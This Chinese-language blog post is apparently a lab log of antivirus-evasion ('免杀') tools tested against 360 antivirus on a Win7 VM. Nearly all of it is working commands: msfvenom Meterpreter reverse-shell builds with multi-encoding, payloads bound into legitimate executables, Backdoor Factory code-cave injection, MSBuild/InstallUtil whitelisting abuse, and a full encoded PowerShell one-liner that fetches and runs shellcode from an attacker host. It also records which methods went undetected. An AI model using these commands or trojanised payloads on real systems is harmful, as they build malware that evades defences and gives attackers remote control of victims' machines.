远控免杀——工具篇

Posted on Edited on Views:

远控免杀——工具篇

前言

免杀对个人而言是一个熟悉又陌生的概念,之前只知道msf上进行简单的encode来免杀,现在还是从基本的工具开始学起

实验环境采用Kali+Win7虚拟机,测试机安装360全家桶

msf自带免杀

原始payload

直接用msfvenom生成原始payload

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f exe -o payload1.exe

image-20220210193805172

360静态动态均可查杀

编码处理

评级最⾼的两个encoder为cmd/powershell_base64x86/shikata_ga_nai

编码次数为15并去掉空字符

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe

image-20220210201725861

image-20220210201847245

360静态动态均可查杀

捆绑

使用msfvenom中的-x参数可以指定一个可执行文件作为模板,将payload嵌入其中,-x 指定文件路径

我这里捆绑的是360安全卫士

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -x 360Safe.exe -f exe -o payload3.exe

image-20220210202657179

image-20220210202821265

image-20220210202853855

360安全卫士静态没扫出来,360杀毒静态查杀,动态均查杀

捆绑+编码

上面两种方法的结合

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -x 360Safe.exe -i 15 -f exe -o payload4.exe

image-20220210203326937

image-20220210203539659

image-20220210203553483

image-20220210203627448

360全家桶静态均可过,动态均查杀

多重编码+捆绑

通过管道符,让msfvenom用不同的编码器反复进行编码混淆

1
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.221.128 LPORT=4444 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x 360Safe.exe -f exe > payload5.exe

image-20220210205818844

image-20220210205930063

image-20220210210357725

360全家桶完全没反应?!

Evasion模块

metasploit 5.0引入的一个新模块

image-20220211154339417

exe

1
2
3
4
5
6
msf6 > use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set filename payload6.exe
msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.221.128
msf6 evasion(windows/windows_defender_exe) > set lport 4444
msf6 evasion(windows/windows_defender_exe) > run

image-20220211154547017

监听

1
2
handler -H 192.168.221.128 -P 4444 -p windows/meterpreter/reverse_tcp
jobs

image-20220211154144937

还没扫描就被删除了

hta

evasion/windows/windows_defender_js_hta模块生成payload

image-20220211155757515

360杀毒静态可查杀

install_util

evasion/windows/applocker_evasion_install_util模块生成payload

image-20220211171158049

使用csc.exe进行编译后用InstallUtil.exe加载文件

image-20220211170422141

1
InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe

360动态可查杀

小结

MSF在被各大安全厂商盯这么紧的情况下,多重编码+捆绑的方式能免杀成功还是出乎意料的

Veil

安装

为了方便直接拉取veil镜像

1
docker pull mattiasohlsson/veil

拉取成功,执行如下命令

1
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil

将Kali的/tmp/veil-output目录映射到docker里面,这样Veil生成的payload可以直接在kali里使用

使用

Veil有两个免杀工具,Evasion和Ordnance

Evasion用做文件免杀

Ordnance生成在Veil-Evasion中使用的shellcode

exe

1
use 1                         //选择Evasionlist                          //查看payload列表use 16                        //go语言生成msf的payloadset lhost 192.168.221.128     set lport 4445generatego_msf                        //生成的payload名称

image-20220211173556181

image-20220211174519477

360静态动态均可查杀

Veil+mingw-w64

(待补)

Venom

(安装出问题,待补)

Shellter

安装

某些版本的Kali自带,没有的可以自行安装,安装过程中不会出现特别坑爹的问题,比较友好

1
apt-get install shellter

运行报错,有提示

1
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装完毕

使用

准备一个pe文件npp.exe,之后Shellter会备份该pe文件,因为生成的payload会覆盖原来的npp.exe

image-20220211210737098

接下来根据情况来选择即可,我选的windows/meterpreter/reverse_tcp

中间有个Enable Stealth Mode,是否使用隐身模式,特意做了两种来尝试

image-20220211195832317

选择隐身模式生成的payload执行后被查杀

image-20220211210316878

选择非隐身模式生成的payload,成功绕过360!

image-20220211211221212

小结

Shellter使用方便,免杀效果不错。第一次用360Safe.exe生成的payload一直没法监听成功也没有被查杀。搜索了下得用32位的,改用老版本notepad++的安装程序,成功收到meterpreter,对于为啥选择非隐身能绕过360还是不太懂

BackDoor-Factory

用户可以在不破坏原有可执行文件的功能的前提下,在文件的代码裂隙中插入shellcode,支持自定义shellcode

安装

直接拉取docker镜像

1
2
3
docker pull secretsquirrel/the-backdoor-factory
docker run -it secretsquirrel/the-backdoor-factory bash
# ./backdoor.py

运行成功

使用

1
docker run -it -v /root/test:/root/payload:z secretsquirrel/the-backdoor-factory

跟Veil使用相似,进行文件夹映射

程序测试

1
python backdoor.py -f /root/payload/360Safe.exe -S

-f: 指定被测试程序

-S: 检查程序是否可被利用

image-20220212125645235

检查exe是否能插入shellcode

搜索Code Caves

1
python backdoor.py -f /root/payload/360Safe.exe -c -l 600

-c: 查找Code Cave

-l: Code Cave Size,用于插入shellcode

image-20220212130536451

找到了5个可利用点

获取payload

1
python backdoor.py -f /root/payload/360Safe.exe -s -show

image-20220212130803057

  1. reverse_shell_tcp_inline :对应msf: use exploit/multi/handlerset

payload windows/meterpreter/reverse_tcp

  1. meterpreter_reverse_https_threaded :对应msf: use

exploit/multi/handlerset payload windows/meterpreter/reverse_https

  1. iat_reverse_tcp_inline : 增加了修复IAT的功能,避免reverse_shell_tcp_inline执⾏失败
  2. iat_reverse_tcp_stager_threaded : 功能类似上一条
  3. user_supplied_shellcode_threaded :对应的msf: use

exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``⾃定义

shellcode

生成payload

1
python backdoor.py -f /root/payload/360Safe.exe -s iat_reverse_tcp_stager_threaded -H 192.168.221.128 -P 4444 -J -o payload8.exe

-J: 选择多个Code Cave注入

image-20220212140152504

360动静态均可查杀

小结

缝隙插入代码的想法比较有意思,但是免杀效果经测试不太行

Avet

(装了近3个小时没法用,心态崩了)

TheFatRat

(待补)

Avoidz

(安装出错,待补)

Green-Hat-Suite

(待补)

zirikatu

zirikatu利用msfvenom生成shellcode,再进行后续处理并生成exe

安装

1
2
chmod +x zirikatu.sh
./zirikatu.sh

运行成功

使用

image-20220212180240192

zirikatu可以修改图标,增加错误提示,监听等功能

image-20220212180215659

360静态可查杀

小结

网上看到的文章中这个操作简单体量小的工具居然能免杀360火绒,测试后静态查杀就翻车了,这个工具也挺老了后续没有更新,可惜

AVIator

AVIator使⽤AES加密来加密给定的Shellcode加密,⽣成⼀个包含加密有效负载的可

执⾏⽂件,然后使⽤各种注⼊技术将shellcode解密并注⼊到⽬标系统,从⽽绕过杀

毒软件的检测

只支持windows,C#开发

安装

直接下载压缩包

1
https://github.com/Ch0pin/AVIator

解压运行exe即可

image-20220212181426434

使用

用msf生成基于C#的shellcode

1
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f csharp -o payload11.c

复制payload11.c中{}内的内容到payload,加密生成新payload

image-20220212182138145

Select path选择存放路径

Injection Techniques选择注入技术,这里用了第二个注入Notepad++

Generate Exe生成可执行文件

image-20220212183258116

360全家桶第一次静态查杀没有反应,但是过了一会就被360杀毒删除隔离了

动态直接被查杀

小结

工具简单,使用便捷。免杀效果不如以前了,作者官方说明文件中也说了,随着工具的流行,工具也长期没有更新,效果确实越来越差了。但是作者提出了一种思路,就是对生成的可执行文件使用C#混淆器,后续可以尝试下

DKMC

DKMC是⼀种⽣成混淆的shellcode的⼯具,并把shellcode合成到图像⽂件中,最终依靠PowerShell执⾏最终的shellcode

安装

1
git clone https://github.com/Mr-Un1k0d3r/DKMC

使用

python dkmc.py运行DKMC,参数解释

[*] (gen) 将msf的shellcode注入到一个BMP图像

[*] (web) 启动web服务用来分发BMP图像

[*] (ps) 生成ps的payload

[*] (sc) 将msf生成的raw文件转为shellcode

[*] (exit) 退出

执行流程如下:

  1. 用msf生成raw文件
  2. 将msf生成的raw文件转为shellcode
  3. 将shellcode注入到BMP图像中
  4. 生成powershell payload
  5. 用web服务分发BMP文件

第一步

1
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o /root/桌面/payload/payload12.raw

第二步

sc设置``source为上一步生成的payload12.raw,生成shellcode,复制并exit返回主菜单

image-20220212202336610

第三步

gen设置shellcode为上一步中复制的内容,生成bmp并exit返回主菜单

image-20220212202635077

第四步

ps设置url为Kali地址,执行生成powershell脚本,复制脚本并exit返回主菜单

image-20220212203218057

1
powershell.exe -nop -w hidden -enc JABIAGEAcABiAEwAUgB0AFQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAdQBvAEIAMgBJAEMALwB6AEUAMgBOAEQAUQAyAE4AagBrAHcATQB6AFUAdQBNAHoAWQAhAHYAVgBaAGQAVAArAE0ANABGAEgAMQBIADQAagA5AFkAbwAwAGgASgBwAEQAUwAwAEIAYgBFAHMAMABrAGkAVQBGAG8AYQBPAEsASABRAEkAUQA5AEYAMABxAHAARwBiADMARABZAGUAbgBEAGcANABUAHEARQBNAC8AUABlADkAegBnAGMAcABvAHUAeQB3AHUAOQBMAG0ASgBZAGwAOQByADMAMQA5AHoAdgBHAHgAagBTAC8AegBIAHIAMABtAEgAOABtAEIAdQBiAGsAeAB5ADIASgBmAE0AUgBHAFQAVwArADkAYQBmAGcAdABaAGQARQBwACsAYgBXADYAUQA4AGgAbABTAFMAUwBOAGkARwBRAHMAcQBmADAAUQBpAHkARABnADQASgBQADkASgBwAFAAIQBoAHkAQwBUAFkAZABiACEAeABEAFUALwBTADYAeABnAEgAdABzAGEAZABKAE8AbQBKAGkATABKADQAcwByAC8AZgB6AGEAUwBFAFcAQgBYAC8ANwBpAGQAUQBuAFQAUwBGAGEATQBvAFoAcABKAFoATgBIAHMAawBvAEIAIQBtAE4AOAArAGwAUAA4AEIAWAA1AFIAWQB3AGYANwBpAGMAdQBwAHAAUwBYAFkAYwBzAHUAOQBVAE0AZwBqAFUANABjADYATAA1AFQANABWAE4AZABzAE8AcwBsAG4AQwBuAEwALwBQADcAZAB0AE0AZQBOADEAcwBRADkAdQBzADAAbwBUAHkAMwBUAFcANgBZAEsASQBqAGYAZwAzAEwAVABKAGsANgAwAG4AdgBGAHcAbQBZAEoAawBEADUAawB1AFIAaQBwAGwAeQBSAHkAegBlAGIAcgB0AGYANAA1AFQATwA0ACEAeABIAFcAOAAhACEAVgBDAGkAQwAxAE0AVABsADEAIQB1AFMAbwBEAEkAWgBWACsAdgBTACEAeABWAGgAbABvAG0AZgBRADAAUwBnAEUAdwBRAFMAVQBzAHgAeQArAC8ARgBDADMASQBCAGwAeABCAG4AbgBEAGoAbQB3AHgAbQBVAFYARgAxAG0AcwBXACEAVABZAHIAMABDAEsAeAAhAE8ANQBZAEQANgBrADcAZwBtAE4AIQB3ADQAWABNAEoAdABZAFoAMwBCAFgATABmADYAOQBTAGQAWgBxAEUAawBZAE4AbABiAFEAZABwAEcAbAB0AG8AWQBPAGMAdAB5AEwAWAB0AEYAKwBYAHUAawBLAHUAagBjADgAcgBnAGgARwBTAEoANAAzAEsAcwAxAEwARQBSAFQAYQBhAHIAVgBGAEoAMwBWACEAOQA0ADcAdwBIAGMAQgBYAFcAVQBLAFEAcwB6AC8ANQBJAG0AZwA0AFoAWQBEAFYAVQBDAGIAbgBFAFgAKwBOAFMAWgBtAEIAUAB5AEYAaQB6AE4ASgA1AE0AaQBEAEcANgBTAHYAeABoADcAMwB3ADUAYwB0ADQANwBaAEsAdgBLAHgAKwB4AFkAZgAhAG0AeABhAFgAdwBsAFcARABDAHAAQgAzAGoAQgByAEsARQBZADEAegBGAHYAeQA3AFEASABNAHgAWgBEAGIAeABuAFQAaQBQAG0AVgBFAHEAMQAxAFoATQBHAE0AUQB3ADYATQBXADQAVwBkAFkAWQBHAFcAVwBYAFoAIQAwACEATQBPAGMANgBvADAAKwAhADQAWgB2ADAANAA3AGkAcABoADYAegBqADMATQBHACEAOQAhAGQAbgB3AGsAUABNAFcAcQBVACEAdgAyAHkAMgBJAEsAUABpADIAegBIAHcAOABnAFEAZwBpAEwAZgB4AE4ANQBtADYASAArAG8AWQBvAHUATgBiACsAcwBaAHQAZgAvAEcARwBSADIATwBVADEAVABoAHcAdwB6ADMASQBDACsAUQB6AHkAZwBIACEASwBIAGQATwBLAFUAbABWADIAZABUAEkAbgA4ADAANgB6AEwASABXAFIAYwBNAFoAKwBtAHEAaABwAHUAWQByADkARQBzADUAeQAxAEsAKwBKAFUAeQBjAHgASABiAGgARwBCAFMAeQA4AEIAbgAxAEcAdQAhAFgASABJAEMAUQB2AGcAYwBPAG0AeABlAFQAVwA3AHUAUgBhAE8ATAB1AFcAYwB4AFgATQBjAGEAWQBGADAAWQBJAHUARwB3AFYATgBhAE0AUgBJAEwAcgBkAFYAaAB1AHgANgBvAGYAcABSAHcAaQBEACEAdwBOADQAVgBqAFQAdQBkAG8AIQBlAFUARwB5AG4AVgBHADUAeABDAFkANgA0AHUAdABOAGsAbQB4AEkAegBRADQARgBTAG8AcgBwAFMATABqAEgAaABmAEsASQBWAGQATQBLAG4AUQBZAEQAYgBTAFcAMgBIACsAdgBwAEwASQBYAFgAVgBCAFgAUQBzAG0AUgBWAGUAeQAzAEMAcABnAHoAUQBMAHUAQwA2AFEAWABjAFoAcAAhAHEAUgAhAEoATABwADAAZwBHAHQAcQBFAEQAMwBTADkAMQBaAHEAQgB4AFEAdQA2ADEAbwBsAGYAUwA2AHAANwBjAFEAZQB2AGMAbABSAFMAYwA2AEgAQwBwADkATABZAHoAVAByADMAdwArAHUANwB6AHcANAAzADIANwA5AGMAeQBMACsAdgBvAG8AbQB2AEgAQwBqAFUAbQA3AG0ASQB1AGEATgBDAGoAaQBsAG8AZgBRAHEAVwBTAC8AYQAyAHQAMQBwADkAdAB0ADcAVwA3ADUANwBiAGIATABiAGYAVgAzAHQAcwBTAG0AVQBvAHkAMQBXAGoAdAA3AHUAegBzADcAdQA3ADkAcwBkADEAMABwADEASAB5AEkAZAArAEkAQgB2AFYAdgB3AHAAdQBWAGcAdAAvAHkAdgAhAEcAVgBhAFUAZwA1AEYAbwA5AFcAVgBvAG4AdgBXAE0AagBqADAAbwAyAEcAZwB1AGsATQB5ADYAcgBQAHIAeAB1AFEATQBYACEAMABlAEQAdwBDAEsAdABZADYAbgAhAHQAZgBlADIAUgBoAFgAbQBqAFEAaABXADEATwBVAEkASgBmADgAWABPADcAdgBmAGIATABKAHMAKwBCAGQAbQAyAGQAVgBkAFAAKwAvAGoAZQBzAEYAWQBWAFEAUQBlAGUAZQBRAGoAeABYAG8AZABPADgAMwAyADQAMgAwAGUAYQBhADkAegB0AE4AdQArAGIAeQA5ADIAdgBzAGkAbQBSAHAAUABRAC8AbgBhAEsAcwBzAGsARgBxAGQAaABPAGUAVABGAEQAIQB1AC8ASAA3AG4ANABYACsAIQBzAGQAUgBuAGkASwAvAGcAdAB6AEQAVwBiAFgALwBUACsAeQA1AG8AbQAwADYANQAvAEYAZgB0AEwAeAB2ACsARQBjAGoALwBEAG8ARQBSAFoAUQByAEQAUABiAFEAbQBEAHMAWABlAGUAIQBPAEkAVQBqAG8AcgBSADIAMwBPAEUAcQBwAGkAVgBqADcANgAxAG4ATwBPAE8AKwBNAE0AagArAEQATgBEAGYATgAhAFUAOQBtAGYAawBaAFgAVgBwACsAdwBCAHIAegB4AHcAUwAvAGIAcwAxAFoATQAyAFYAVgBTAHEAeABrADgAeAB4AFgAdABTAG8AZwA5AEMAeQArAGkAeQBoAFUAMwA2AFIAOQBkAEUAZgA1AEUAbgAwAGsAIQAhAE8AdQBsADIARwB5ADkATQBjAHAANQBwAFAAeQBKAEcAYwBlAEYANwBKAEgAZQA0AGgAagB6ADcAawBWAHkAIQBEADMAagB2AGEAWAB3AFcAMAA5AHgAdgAhAEkAKwBPADEAWgBuAHkARQBmAE8AOAB2AFAAcwB2AGEAYQBvAFoARwBUAFEASwAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsAIAAkAHIAVQBlAFIAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQASABhAHAAYgBMAFIAdABUACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcgBVAGUAUgApAC4ASQBuAHYAbwBrAGUAKAApAAoA

第五步

web直接run,此时Win7已经可以通过上一步的url下载图片了

image-20220212203907952

运行效果

image-20220212204141231

image-20220212204501644

360全家桶对bmp图片进行扫描没有问题,但是执行ps脚本会警告

小结

DKMC通过把shellcode注入到bmp文件中再利用powershell来执行,虽然图片没有被查杀但是powershell的行为容易被杀软注意到,后续可以对ps代码进行混淆来进一步利用

Unicorn

安装

1
git clone https://github.com/trustedsec/unicorn.git

用法

可生成ps1、macro、hta、dde等代码和文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example SettingContent-ms: python unicorn.py <cobalt_strike_file.cs cs ms
HTA Example SettingContent-ms: python unicorn.py <patth_to_shellcode.txt>: shellcode ms
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00 or metasploit)
Custom Shellcode HTA: python unicorn.py <path_to_shellcode.txt> shellcode hta (formatted 0x00 or metasploit)
Custom Shellcode Macro: python unicorn.py <path_to_shellcode.txt> shellcode macro (formatted 0x00 or metasploit)
Generate .SettingContent-ms: python unicorn.py ms
Help Menu: python unicorn.py --help

使用

生成payload

1
python unicorn.py windows/meterpreter/reverse_https 192.168.221.128 4444

image-20220212211144925

生成powershell_attack.txtunicorn.rc

直接用msfconsole -r unicorn.rc快速启动MSF

在目标机执行powershell脚本

image-20220212211726185

360直接阻止powershell运行了

小结

可生成代码多样,但是不经过混淆直接使用很难免杀

Python-Rootkit

(待补)

ASWCrypter

该工具使用python脚本对hta代码进行编码处理,生成新的hta后门

安装

1
git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git

使用

1
2
chmod +x ASWCrypter.sh
./ASWCrypter.sh

选择G,generate

image-20220212215442859

配置LHOST、LPORT

image-20220212215316449

如果生成payload时报错可以mkdir output

image-20220212215104051

image-20220212215908266

执行被360安全卫士警告

小结

静态免杀效果不错,但是调用powershell的行为会被警告

nps_payload

nps_payload可以⽣成基于msbuild的xml⽂件和独⽴执⾏的hta⽂件,并对xml⽂件和hta⽂件做了⼀定的混淆免杀,以达到免杀目的

安装

1
2
git clone https://github.com/trustedsec/nps_payload
pip install -r requirements.txt

使用

image-20220212221042746

只需要使用msbuild_nps.xml

需要用msbuild.exemsbuild.exe在windows中的一般路径C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe

Windows

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml

Kali

1
msfconsole -r msbuild_nps.rc

image-20220212225126509

image-20220212221714694

动静态均未被查杀

小结

基于白名单程序msbuild.exe执行payload,同时nps_payload对生成的文件进行了混淆,两者结合免杀效果确实强力

HERCULES

(安装问题,待补)

SpookFlare

安装

1
git clone https://github.com/hlldz/SpookFlare.gitpip install -r requirements.txt

使用

直接python spookflare.py执行

image-20220212230929914

image-20220212231102345

支持四种payload

  1. msf的exe程序(自编译)
  2. msf的ps1脚本(免杀混淆)
  3. hta
  4. office宏代码

info可以查看需要配置的参数

image-20220212232114869

image-20220212232546093

参数配置完毕以后生成C#文件,需要用csc.exe编译成exe

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe xxxx.cs

image-20220212232815419

360全家桶第一次扫描没有查杀,过了一会被360杀毒查杀

小结

SpookFlare会对每次生成的payload进行代码混淆处理来增加免杀概率,exe文件免杀效果一般,hta可过静态查杀

SharpShooter

SharpShooter是武器化的Payload生成框架,支持反沙箱分析、分阶段和无阶段的Payload执行,并能够规避入口监测。

安装

1
2
git clone https://github.com/mdsecactivebreach/SharpShooter
pip install -r requirements.txt

使用

执行python SharpShooter.py -h

image-20220212233613004

-h, –help 帮助菜单

–stageless 创建一个不分阶段的payload

–dotnetver 制定dotnet的版本,2或者4

–com COM 分阶段技术*:* 如outlook, shellbrowserwin,

wmi, wscript, xslremote

–awl 使用程序白名单技术*: wmic, regsvr32*

–awlurl 指定取回 XSL/SCT payloadurl地址

–payload Payload 类型*: hta, js, jse, vbe, vbs, wsf,*

macro, slk

–sandbox 绕过沙盒技术*:*

[1] Key to Domain (e.g. 1=CONTOSO)

[2] Ensure Domain Joined

[3] Check for Sandbox Artifacts

[4] Check for Bad MACs

[5] Check for Debugging

–amsi 使用AMSI绕过技术*: amsienable*

–delivery 分发方法*: web, dns, both*

–rawscfile 指定生成payloadshellcode

–shellcode 使用内置的shellcode

–scfile 指定C#shellcode的路径

–refs 指定C#需要的依赖文件,如mscorlib.dll

–namespace 指定C#Namespace,如Foo.bar

–entrypoint 指定C#需要执行的方法,如Main

–web 指定web分发的地址

–dns 指定Dns分发的地址

–output 输出文件的名称

–smuggle HTML内的隐藏文件

–template 指定生成htmltemplate文件 (e.g. mcafee)

官方文档里提供了各种payload的生成命令,使用前可以查看一下

接下来尝试创建一个hta后门

msfvenom生成shellcode

1
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o shellcode.txt

用SharpShooter创建hta后门

1
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./shellcode.txt --sandbox 4 --smuggle --template mcafee

image-20220215151041983

image-20220215151355065

image-20220215151612441

运行被查杀

小结

这个框架比较复杂,功能强大。在本次测试只是简单的使用了其中的一些功能,免杀效果比较一般,可能是比较出名或者太老了,但是默认生成的payload还可以用其他的方法进行进一步免杀后效果应该会有所提升

资料:https://www.anquanke.com/post/id/100533

CACTUSTORCH

安装

1
git clone https://github.com/mdsecactivebreach/CACTUSTORCH

使用

先用MSF或者CS生成一个32位shellcode并用base64编码

1
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin

image-20220215152616661

复制Base64编码后的shellcode到CACTUSTORCH.js中的code部分

PS:上面的binary参数也可以替换,例如:计算器(calc.exe)

image-20220215152829223

目标机执行

1
wscript.exe CACTUSTORCH.js

执行被360杀毒拦截

小结

本工具和上一个测试的开发者相同,测试效果不太行,但是同样的可以尝试对脚本2代码进行二次免杀来提高免杀能力

总结

本篇多各种免杀工具进行了学习,并没有把所有功能都一一尝试过去,安装过程中出现的各种奇奇怪怪的问题总是令人抓狂,查了一堆文章水平也是参差不齐,过程有时枯燥有时免杀成功又会非常兴奋,总的来说还是有收获的

杀软在不断更新迭代,免杀技术也在不断进步创新,两者在互相碰撞中发展,通过使用不断出现的免杀工具,学习工具免杀的原理和思路,也是了解免杀技术发展的一种方法

最后,安装问题出现的工具后续有空会补上